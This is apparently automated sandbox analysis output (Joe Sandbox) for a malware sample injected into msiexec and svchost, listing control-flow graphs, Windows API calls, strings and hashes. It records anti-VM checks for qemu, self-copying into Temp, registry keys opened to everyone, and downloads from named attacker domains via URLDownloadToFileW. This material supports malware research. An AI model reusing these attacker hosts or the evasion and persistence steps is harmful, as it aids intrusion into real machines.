            control_flow_graph 26 40141c-40145b GetPEB call 4010e6 29 401461-401473 26->29 30 401773-401774 26->30 29->30 33 401479-40147f 29->33 34 401482-401486 33->34 35 401488-401493 call 4010e6 34->35 36 40149d-4014c8 34->36 35->30 40 401499-40149b 35->40 41 401755-401761 36->41 42 4014ce-4014ed SetErrorMode CreateToolhelp32Snapshot 36->42 40->34 45 401767-40176e call 401284 41->45 43 4014f3-401502 Process32First 42->43 44 40159e-4015b8 42->44 47 401598-40159b CloseHandle 43->47 48 401508-401525 call 4013d1 call 4010c6 43->48 44->45 52 4015be-4015e7 44->52 45->30 47->44 48->45 56 40152b-401530 48->56 57 401746-401753 52->57 58 4015ed-4015ff call 4010e6 52->58 56->45 59 401536-40153b 56->59 57->41 57->45 58->57 64 401605-401617 call 4010e6 58->64 59->45 61 401541-401546 59->61 61->45 63 40154c-401551 61->63 63->45 65 401557-40155c 63->65 64->57 70 40161d-40162f call 4010e6 64->70 65->45 67 401562-401567 65->67 67->45 69 40156d-401572 67->69 69->45 71 401578-40157d 69->71 70->57 75 401635-40168a RegOpenKeyExA 70->75 71->45 73 401583-401592 Process32Next 71->73 73->47 73->48 75->57 76 401690-4016af RegQueryValueExA 75->76 77 4016b1-4016cb VirtualAlloc 76->77 78 401719-40172c RegCloseKey 76->78 77->78 79 4016cd-401716 RegQueryValueExA call 4013d1 VirtualFree 77->79 78->45 80 40172e-401738 78->80 79->78 80->45 82 40173a-401744 80->82 82->45 82->57
            APIs
            • SetErrorMode.KERNELBASE(00008007), ref: 004014D3
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004014E4
            • Process32First.KERNEL32(?,00000128), ref: 004014FD
            • Process32Next.KERNEL32(?,00000128,?,?), ref: 0040158D
            • CloseHandle.KERNELBASE(?), ref: 0040159B
            • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?,74737973,635C6D65,65727275,6F63746E,6F72746E,7465736C,7265735C,65636976,69645C73,655C6B73,006D756E), ref: 00401682
            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00000030), ref: 004016A7
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004016C0
            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,00000030), ref: 004016E9
            • VirtualFree.KERNELBASE(?,00000000,00008000,?), ref: 00401716
            • RegCloseKey.KERNEL32(?), ref: 0040171F
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.365771183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_8_2_400000_msiexec.jbxd
            Similarity
            • API ID: CloseProcess32QueryValueVirtual$AllocCreateErrorFirstFreeHandleModeNextOpenSnapshotToolhelp32
            • String ID: kernel32.dll$qemu
            • API String ID: 3416793138-845065503
            • Opcode ID: 2e631d7524987b0bd2e47c759a5ff12424a88cbcc9a4f19d0c3fb3083ec3de41
            • Instruction ID: 468c751b226159dc199a135d671abf22a65772dcafaf88a47907e385a4693d6d
            • Opcode Fuzzy Hash: 2e631d7524987b0bd2e47c759a5ff12424a88cbcc9a4f19d0c3fb3083ec3de41
            • Instruction Fuzzy Hash: 2F816F70D00219ABDF259BA5DD49FEEB6B9AF04344F104076F904F62E0EB75DE408B59
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 84 4017af-4017b0 85 4017b1-4017b2 84->85 86 401735-401738 84->86 87 401824 85->87 88 4017b4 85->88 89 401767-40176e call 401284 86->89 90 40173a-401744 86->90 92 401826-401831 87->92 88->92 93 4017b5 88->93 95 401773-401774 89->95 90->89 94 401746-401753 90->94 105 401843-401846 92->105 106 401833-401838 92->106 96 4017b6-4017b7 93->96 97 4017cd-4017e2 93->97 94->89 98 401755-401761 94->98 100 4017b9-4017cc 96->100 101 40181b-40181e 96->101 102 4017e4 97->102 103 4017a5 97->103 98->89 100->97 101->87 104 4017a7-4017ab 102->104 107 4017e6-40181a 102->107 103->104 104->84 108 40183c-401840 105->108 109 401848-401866 105->109 106->108 107->101 111 401842 108->111 112 401867-40188e 108->112 109->112 111->105 113 401890-4018a2 112->113 114 4018a5-4018b5 112->114 113->114 116 4018b8-4018ca 114->116 119 4018cc-4018e0 116->119 120 4018e2-4018e9 119->120 121 4018ee-4018fb 119->121 122 4018ea-4018ec 120->122 123 4018fd 121->123 124 4018fe-40193d 121->124 122->121 123->124 127 401944 124->127 128 401946-401948 127->128 128->122 129 401949-40194e 128->129 130 4019b4-4019b5 129->130 131 40194f-401952 129->131 133 401a21-401a39 130->133 134 4019b7 130->134 131->131 132 401954-401964 131->132 132->128 139 401966-401977 132->139 138 401a3d-401a47 133->138 134->127 135 4019b9-401a0a 134->135 140 401a98-401a9a 138->140 141 401a49-401a4b 138->141 144 401a76-401a85 140->144 145 401a9c-401aa5 140->145 142 401a86-401a8c 141->142 143 401a4d-401a73 141->143 146 401acb-401acd 142->146 147 401a8e-401a90 142->147 143->144 144->142 148 401aa7-401aab 145->148 149 401afd-401b0a 145->149 150 401b4c-401b59 146->150 151 401acf-401ade 146->151 152 401a13-401a20 147->152 153 401a93-401a95 147->153 155 401aae-401ab4 148->155 154 401b0c-401b0d 149->154 151->155 156 401ae0-401ae2 151->156 152->133 153->140 157 401abe-401ac7 154->157 158 401b0f-401b21 154->158 155->138 159 401ab6-401abc 155->159 156->149 157->154 167 401ac9-401aca 157->167 161 401b27-401b47 158->161 159->157 165 401b49-401b4b 161->165 166 401b6f 161->166 165->150 168 401bf0-401bfe 166->168 169 401b71-401bab 166->169 167->146 170 401c00-401c38 168->170 171 401c6b-401c6e 168->171 176 401bec-401bef 169->176 177 401bad-401bb5 169->177 172 401c3b-401c68 170->172 173 401c8e-401c91 170->173 172->171 175 401c94-401c9c 173->175 175->175 178 401c9e-401ca8 175->178 176->168 177->161 180 401b6b-401b6e 177->180 180->166
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.365771183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_8_2_400000_msiexec.jbxd
            Similarity
            • API ID:
            • String ID: >>D?$qemu$r$|
            • API String ID: 0-3285580769
            • Opcode ID: 1a392441aa8856709dca4c86d266e29f63927c66334f18aeb310f7c0d4764a56
            • Instruction ID: 6bb0507b81e2be8d2a0440dca3e1e658e6d3b306f004734f08b6d44302c3b898
            • Opcode Fuzzy Hash: 1a392441aa8856709dca4c86d266e29f63927c66334f18aeb310f7c0d4764a56
            • Instruction Fuzzy Hash: 02F1DE325193819FD722DF3489856D6BFA4EF43324B2806EED4D19B2A3D3388947CB85
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 181 401284-4012b9 GetPEB call 4010e6 184 4013b5-4013b6 181->184 185 4012bf-4012d1 call 4010e6 181->185 188 4012d7-4012fe NtAllocateVirtualMemory 185->188 189 4013ae-4013b0 185->189 188->189 190 401304-401332 call 401020 call 4011c2 188->190 189->184 195 401339-401344 190->195 196 401346-40134c 195->196 197 401355 196->197 198 40134e-401352 196->198 197->196 199 401357 197->199 198->197 199->195 201 401359-401378 call 4010e6 199->201 201->189 204 40137a-40138c call 4010e6 201->204 204->189 207 40138e-4013a1 call 401153 204->207 207->189 210 4013a3-4013ac call 1e00c0 207->210 210->189
            APIs
            • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000040,?,940959B9,?,E4105E5C), ref: 004012F9
            Memory Dump Source
            • Source File: 00000008.00000002.365771183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_8_2_400000_msiexec.jbxd
            Similarity
            • API ID: AllocateMemoryVirtual
            • String ID:
            • API String ID: 2167126740-0
            • Opcode ID: a363f6005b41687ada2095bafe0eddf377c622b55124c9d0354192962db49b21
            • Instruction ID: ad6a7e30c07a5fb5cab8b2019c34c62f16c151d363a2bd10c2ef0f32770b5323
            • Opcode Fuzzy Hash: a363f6005b41687ada2095bafe0eddf377c622b55124c9d0354192962db49b21
            • Instruction Fuzzy Hash: 79414F71A0020AAFDF01DFA5C881BAEB7B5EF08314F148176AD10BB2E5D739E951CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 000219E5
            • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004,00000000,00008000,00001000,00000004), ref: 00021A03
            • ExpandEnvironmentStringsW.KERNEL32(?,00008000,00000000,00008000,00001000,00000004,00000000,00008000,00001000,00000004), ref: 00021A21
            • lstrcatW.KERNEL32(?,\Local Settings), ref: 00021A2E
            • CreateDirectoryW.KERNEL32(?,00000000,?,\Local Settings,?,00008000,00000000,00008000,00001000,00000004,00000000,00008000,00001000,00000004), ref: 00021A38
            • lstrcatW.KERNEL32(?,\Temp), ref: 00021A45
            • CreateDirectoryW.KERNEL32(?,00000000,?,\Temp,?,00000000,?,\Local Settings,?,00008000,00000000,00008000,00001000,00000004,00000000,00008000), ref: 00021A4F
            • GetShortPathNameW.KERNEL32(?,?,00008000), ref: 00021A5F
            • lstrcpyW.KERNEL32(?,?), ref: 00021A6A
            • lstrlenW.KERNEL32(?,?,?,?,?,00008000,?,00000000,?,\Temp,?,00000000,?,\Local Settings,?,00008000), ref: 00021A72
            • lstrcmpiW.KERNEL32(?,?,?,?,?,?,?,00008000,?,00000000,?,\Temp,?,00000000,?,\Local Settings), ref: 00021A95
            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00021AAD
            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,00008000,?,00000000,?,\Temp,?), ref: 00021CD1
              • Part of subcall function 00021833: GetTickCount.KERNEL32(?), ref: 0002183C
              • Part of subcall function 00021833: RtlAllocateHeap.NTDLL(00000000,00000080,?), ref: 0002185E
              • Part of subcall function 00021833: RtlRandom.NTDLL(?), ref: 0002187D
            • wsprintfW.USER32 ref: 00021ADC
            • HeapFree.KERNEL32(00000000), ref: 00021AF6
            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00021B0F
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000006,00000000), ref: 00021B31
            • ReadFile.KERNEL32(?,?,00008000,?,00000000), ref: 00021B55
            • WriteFile.KERNEL32(?,?,?,00000000,?), ref: 00021B72
            • CloseHandle.KERNEL32(?), ref: 00021B7C
            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00021BA6
            • GetFileTime.KERNEL32(?,?,?,?,?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000), ref: 00021BBD
            • CloseHandle.KERNEL32(?), ref: 00021BC5
            • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,80000000,00000001,00000000,00000003,00000080,00000000,?), ref: 00021BDC
            • CloseHandle.KERNEL32(?), ref: 00021BE7
            • lstrcpy.KERNEL32(?,?), ref: 00021BF5
            • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,?,?,?,?,?,?), ref: 00021C13
            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(D:(A;;KA;;;WD),00000001,?,00000000), ref: 00021C2D
            • RegSetKeySecurity.ADVAPI32(?,00000004,?,D:(A;;KA;;;WD),00000001,?,00000000,?,00000000,00000000,00000000,00040000,00000000,?,00000000,?), ref: 00021C3A
            • RegCloseKey.ADVAPI32(?,?,00000004,?,D:(A;;KA;;;WD),00000001,?,00000000,?,00000000,00000000,00000000,00040000,00000000,?,00000000), ref: 00021C4A
            • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00060006,00000000,?,00000000,?,?,00000004,?,D:(A;;KA;;;WD),00000001,?,00000000), ref: 00021C68
            • RegSetValueExW.ADVAPI32(?,00000000,00000001,?,?,?,00000000,00000000,00000000,00060006,00000000,?,00000000,?,?,00000004), ref: 00021C80
            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(D:(A;;KRWD;;;WD),00000001,?,00000000), ref: 00021C92
            • RegSetKeySecurity.ADVAPI32(?,00000004,?,D:(A;;KRWD;;;WD),00000001,?,00000000,?,00000000,00000001,?,?,?,00000000,00000000,00000000), ref: 00021C9F
            • RegCloseKey.ADVAPI32(?,?,00000004,?,D:(A;;KRWD;;;WD),00000001,?,00000000,?,00000000,00000001,?,?,?,00000000,00000000), ref: 00021CA7
            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00021CBD
            • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00008000,00001000,00000004,00000000,00008000,00001000,00000004), ref: 00021CE0
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: CreateFile$Security$Close$DescriptorVirtual$FreeHandle$AllocConvertDirectoryHeapStringTimelstrcatlstrcpy$AllocateCountEnvironmentExpandNamePathRandomReadShortStringsTickValueWritelstrcmpilstrlenwsprintf
            • String ID: %s\ms%s.%s$D:(A;;KA;;;WD)$D:(A;;KRWD;;;WD)$\Local Settings$\Temp
            • API String ID: 3624018530-1859796181
            • Opcode ID: 49afd6e5a0ef94dcd24a16e57757b0aa5e90aeef25b32487033e61c2aa11a375
            • Instruction ID: e6252c1eb0c35e1fd87d81646474356fa797e514c13ed454e024a5073afa759e
            • Opcode Fuzzy Hash: 49afd6e5a0ef94dcd24a16e57757b0aa5e90aeef25b32487033e61c2aa11a375
            • Instruction Fuzzy Hash: D8811F71950219BEEF61ABD0ED43FEEBA79EB04700F204175B610750E2EBB56F109B64
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • GetProcessHeap.KERNEL32(?,1BC558EA), ref: 0002099D
              • Part of subcall function 00020550: GetVolumeInformationA.KERNEL32(?,?,?,?,?,?,?,3A707474), ref: 00020585
            • GetVersionExA.KERNEL32(00000094), ref: 000209D6
            • NtQueryInformationProcess.NTDLL(000000FF,0000001A,00000000,00000004,00000000), ref: 00020A00
            • NtDelayExecution.NTDLL(00000000,FE363C80), ref: 00020A33
            • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004,00000000,FE363C80,00000094), ref: 00020A46
            • GetEnvironmentVariableW.KERNEL32(src,?,00008000,00000000,00008000,00001000,00000004,00000000,FE363C80,00000094), ref: 00020A63
            • SetEnvironmentVariableW.KERNEL32(src,00000000,src,?,00008000,00000000,00008000,00001000,00000004,00000000,FE363C80,00000094), ref: 00020A77
            • GetShortPathNameW.KERNEL32(?,?,00008000), ref: 00020A87
            • wsprintfA.USER32 ref: 00020AA0
            • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00020AB0
            • GetLastError.KERNEL32(00000000,00000000,?), ref: 00020ABA
            • SetFileAttributesW.KERNEL32(?,00000080,?,00000000,00000000,?), ref: 00020ADA
            • DeleteFileW.KERNEL32(?,?,00000080,?,00000000,00000000,?), ref: 00020AE2
            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000080,?,00000000,00000000,?), ref: 00020AF1
            • WSAStartup.WS2_32(00000202,?), ref: 00020B02
            • CreateThread.KERNEL32(00000000,00000000,Function_00000776,00000000,00000000,00000000), ref: 00020B13
            • CloseHandle.KERNEL32(00000000), ref: 00020B19
            • CreateThread.KERNEL32(00000000,00000000,Function_00000846,00000000,00000000,00000000), ref: 00020B2A
            • CloseHandle.KERNEL32(00000000), ref: 00020B30
            • CreateThread.KERNEL32(00000000,00000000,Function_00000590,00000000,00000000,00000000), ref: 00020B4D
            • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00020B59
            • CloseHandle.KERNEL32(00000000), ref: 00020B5E
            • NtDelayExecution.NTDLL(00000000,?), ref: 00020B80
            • SetFileAttributesW.KERNEL32(?,00000080,00000000,00000000,?), ref: 00020B8F
            • DeleteFileW.KERNEL32(?,?,00000080,00000000,00000000,?), ref: 00020B97
            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000080,00000000,00000000,?), ref: 00020BA6
            • ExitProcess.KERNEL32(00000000,00000000,00008000,00001000,00000004,00000000,FE363C80,00000094), ref: 00020BAD
            • SetErrorMode.KERNEL32(00008007,?,00000000,00000000,00008000,00001000,00000004,00000000,FE363C80,00000094), ref: 00020BBA
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: CreateFile$CloseHandleProcessThreadVirtual$AttributesDelayDeleteEnvironmentErrorExecutionFreeInformationVariable$AllocExitHeapLastModeMutexNameObjectPathQueryShortSingleStartupVersionVolumeWaitwsprintf
            • String ID: %lu$src$src
            • API String ID: 4156576649-1697788582
            • Opcode ID: fd03638f55a1054701fe20a09e0933065fc1fb400533e1e0722e263bdea9c015
            • Instruction ID: 978f0be34db3e60213f59978daec0b538318f509b27ab584c3bea470ebe3d314
            • Opcode Fuzzy Hash: fd03638f55a1054701fe20a09e0933065fc1fb400533e1e0722e263bdea9c015
            • Instruction Fuzzy Hash: 8E5188B0A40324FEEB64FBE0ED47FEEB678AF04700F104565B614A61D3DBB85A049B65
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • _memset.LIBCMT ref: 001E145F
            • _memset.LIBCMT ref: 001E147A
            • _memset.LIBCMT ref: 001E1495
            • GetTempPathW.KERNEL32(00000104,?), ref: 001E14A9
            • GetTempFileNameW.KERNELBASE(?,001EACE4,00000000,?,?,?,?,?,?,?,?,00000000), ref: 001E14E1
            • RegOpenKeyExW.KERNEL32 ref: 001E1530
            • RegQueryValueExW.KERNEL32(?,IMAGE_FILE_HEADER,00000000,00000000,00000000,00000000), ref: 001E1546
            • RegSetValueExW.KERNEL32 ref: 001E1562
            • RegCloseKey.ADVAPI32(?), ref: 001E156F
            • URLDownloadToFileW.URLMON(00000000,?,?,00000010,00000000), ref: 001E1589
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E15A0
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E15B6
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E15C3
            • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 001E15E7
            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E15FF
            • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 001E1611
            • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 001E162B
            • RegOpenKeyExW.ADVAPI32 ref: 001E166C
            • RegSetValueExW.ADVAPI32 ref: 001E1683
            • RegCloseKey.ADVAPI32(?), ref: 001E1690
            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 001E169E
            • CloseHandle.KERNEL32(?), ref: 001E16AB
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E16BE
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E16D0
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001E16DD
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: File$Delete$CloseValue_memset$AttributesOpenTempVirtual$AllocCreateDownloadFreeHandleNamePathQueryReadSize
            • String ID: ::di$IMAGE_FILE_HEADER$Software$http://pe.suckmycocklameavindustry.in/
            • API String ID: 3533175232-3580285602
            • Opcode ID: a81183b458f3ba9d1c78c6234ce3a582ff3b0d520fe918218359e1515a2f0d3b
            • Instruction ID: c12fc107719c2797698f017e6ecc4900bdef0cc8e4eb076306cccd38c004ba5f
            • Opcode Fuzzy Hash: a81183b458f3ba9d1c78c6234ce3a582ff3b0d520fe918218359e1515a2f0d3b
            • Instruction Fuzzy Hash: 8C71BBB1A40758BBEB20DBA1DC49FEE737DEF88710F404599F609AA1C1D7719E848B60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: ClassRegister
            • String ID: #usb# $0x7FFFFFFF$DOS_STUB$IMAGE_FILE_HEADER$ImageBase$http://img.suckmycocklameavindustry.in/$http://pe.suckmycocklameavindustry.in/$http://sc.suckmycocklameavindustry.in/${xu
            • API String ID: 2764894006-4219322296
            • Opcode ID: 0e3d26357070633fe15c0a68a71c677059d31068bcf3d62ba9262c2b7ee69ce4
            • Instruction ID: 63905267aaf4c4ecec3e05fc67c584cda324f69f6774af9074f4eacc167207d0
            • Opcode Fuzzy Hash: 0e3d26357070633fe15c0a68a71c677059d31068bcf3d62ba9262c2b7ee69ce4
            • Instruction Fuzzy Hash: F541C77160478167C310AFA6AD45AAFB7E9EFD4B10F40092EFA459B281DBB09941C7A3
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 331 21474-214a3 call 213c9 334 214a5-214b4 call 211ec 331->334 335 214c9-214da socket 331->335 334->335 344 214b6-214c5 334->344 336 2152f-21534 335->336 337 214dc-214ec connect 335->337 339 21500-2151a getsockname 337->339 340 214ee-214f5 337->340 343 2151d-2152a shutdown closesocket 339->343 342 214f7-214fe 340->342 340->343 342->337 343->336 344->335
            APIs
              • Part of subcall function 000213C9: DnsQuery_A.DNSAPI(?,00000001,00000000,00000000,?,00000000), ref: 000213E1
              • Part of subcall function 000213C9: DnsRecordListFree.DNSAPI(?,00000001), ref: 0002140A
            • socket.WS2_32(00000002,00000001,00000000), ref: 000214CF
            • connect.WS2_32(?,?,00000010), ref: 000214E5
            • getsockname.WS2_32(?,?,?), ref: 00021512
            • shutdown.WS2_32(?,00000002), ref: 00021522
            • closesocket.WS2_32(?), ref: 0002152A
              • Part of subcall function 000211EC: RtlAllocateHeap.NTDLL(00000008,00000800), ref: 00021206
              • Part of subcall function 000211EC: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000008,00000800), ref: 00021223
              • Part of subcall function 000211EC: RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 0002123E
              • Part of subcall function 000211EC: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,00000008,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000008,00000800), ref: 0002125D
              • Part of subcall function 000211EC: DnsWriteQuestionToBuffer_W.DNSAPI(000215D6,00000800,?,00000001,00001234,00000001), ref: 00021284
              • Part of subcall function 000211EC: socket.WS2_32(00000002,00000002,00000011), ref: 000212B0
              • Part of subcall function 000211EC: WSACreateEvent.WS2_32 ref: 000212C1
              • Part of subcall function 000211EC: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 000212D1
              • Part of subcall function 000211EC: sendto.WS2_32(?,000215D6,00000800,00000000,00000002,00000010), ref: 000212EF
              • Part of subcall function 000211EC: WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 00021305
              • Part of subcall function 000211EC: recvfrom.WS2_32(?,000215D6,00000800,00000000,00000000,00000010), ref: 0002132E
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: AllocateByteCharEventHeapMultiWidesocket$Buffer_CreateFreeListObjectQuery_QuestionRecordSelectSingleWaitWriteclosesocketconnectgetsocknamerecvfromsendtoshutdown
            • String ID: www.update.microsoft.com
            • API String ID: 2761874391-1705189816
            • Opcode ID: a8f424bb0f59e477e0702b154a7d5597803800d1b3ebef582881c5649f559ce8
            • Instruction ID: 5eff0d5360ddb47700480bd5c9b62afc755c512c18089e12253205f9ca0e93cc
            • Opcode Fuzzy Hash: a8f424bb0f59e477e0702b154a7d5597803800d1b3ebef582881c5649f559ce8
            • Instruction Fuzzy Hash: 8B118E70D0022EEADF11ABE4E842BEEBAB9EF14310F404025E554B6192E3718A498BB5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000040,?,940959B9,?,E4105E5C), ref: 000812F9
            Memory Dump Source
            • Source File: 00000009.00000002.381464840.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_80000_svchost.jbxd
            Similarity
            • API ID: AllocateMemoryVirtual
            • String ID:
            • API String ID: 2167126740-0
            • Opcode ID: a363f6005b41687ada2095bafe0eddf377c622b55124c9d0354192962db49b21
            • Instruction ID: d04b46f46cbdd1d0d10300c164776970914407512efda5b239b15703850e1ef2
            • Opcode Fuzzy Hash: a363f6005b41687ada2095bafe0eddf377c622b55124c9d0354192962db49b21
            • Instruction Fuzzy Hash: 81412F71E0060AAFDF51EFA5CC81AEEB7B9FF04310F148164A950AB296D774EA52CF50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetVolumeInformationA.KERNEL32(?,?,?,?,?,?,?,3A707474), ref: 00020585
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: InformationVolume
            • String ID:
            • API String ID: 2039140958-0
            • Opcode ID: 6423bffbeebb44c7b3fb064871ea960c82787149df9caf2e4cc1b6f6c38ca714
            • Instruction ID: bdd2887277a7f0a043e83c0c0ab10f77786c33b5b3ab250f4ba778d4526d5bac
            • Opcode Fuzzy Hash: 6423bffbeebb44c7b3fb064871ea960c82787149df9caf2e4cc1b6f6c38ca714
            • Instruction Fuzzy Hash: 85E065B1520244BFDB05CB94CCC6DEAB7BCFB08210B0482A9E9129B242E270FE008630
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 78 21535-21549 79 217eb-217f2 78->79 80 2154f-21559 lstrlen 78->80 80->79 81 2155f-21573 RtlAllocateHeap 80->81 81->79 82 21579-21583 81->82 83 21585 82->83 84 21588-21594 lstrcpy 82->84 83->84 85 2159b-2159e 84->85 86 215a0-215a2 85->86 87 215ab-215c7 call 21416 85->87 86->85 88 215a4-215a7 86->88 91 215c9-215cc 87->91 92 215ce-215d8 call 211ec 87->92 88->87 93 2160a-2161b socket 91->93 98 215da-215dd 92->98 99 215df-215e9 call 213c9 92->99 95 21621-21631 connect 93->95 96 217db-217e6 HeapFree 93->96 100 217d3-217d6 closesocket 95->100 101 21637-2164e RtlAllocateHeap 95->101 96->79 98->93 107 215f0-215fa gethostbyname 99->107 108 215eb-215ee 99->108 100->96 101->100 103 21654-21658 101->103 105 21675-21688 wsprintfA 103->105 106 2165a-21673 wsprintfA 103->106 109 2168b-2169d send 105->109 106->109 107->96 110 21600-21607 107->110 108->93 111 216af-216c3 recv 109->111 112 2169f-216aa send 109->112 110->93 113 217b9-217ce HeapFree shutdown 111->113 114 216c9-216cc 111->114 112->111 113->100 114->113 115 216d2-216dc 114->115 115->113 116 216e2-216e6 115->116 117 216f4-216f7 116->117 118 216e8-216ef 116->118 119 21703-21708 117->119 120 216f9-216fb 117->120 118->113 122 2170a-2170d 119->122 123 2170f-21725 recv 119->123 120->113 121 21701 120->121 121->117 122->117 123->113 124 2172b-2172e 123->124 124->113 125 21734-21748 RtlAllocateHeap 124->125 125->113 126 2174a-2175e recv 125->126 126->113 127 21760-21763 126->127 128 217a2-217b2 HeapFree 127->128 129 21765-2178f RtlSizeHeap RtlReAllocateHeap 127->129 128->113 129->128 130 21791-217a0 129->130 130->126
            APIs
            • lstrlen.KERNEL32(00000000), ref: 00021552
            • RtlAllocateHeap.NTDLL(00000000,00000001,00000000), ref: 00021569
            • lstrcpy.KERNEL32(00000000,00000000), ref: 0002158C
            • socket.WS2_32(00000002,00000001,00000006), ref: 00021610
            • connect.WS2_32(?,00000002,00000010), ref: 0002162A
            • RtlAllocateHeap.NTDLL(00000008,00000401,00000002), ref: 00021644
            • wsprintfA.USER32 ref: 0002166B
            • wsprintfA.USER32 ref: 00021683
            • send.WS2_32(?,00000000,00000000,00000000), ref: 00021694
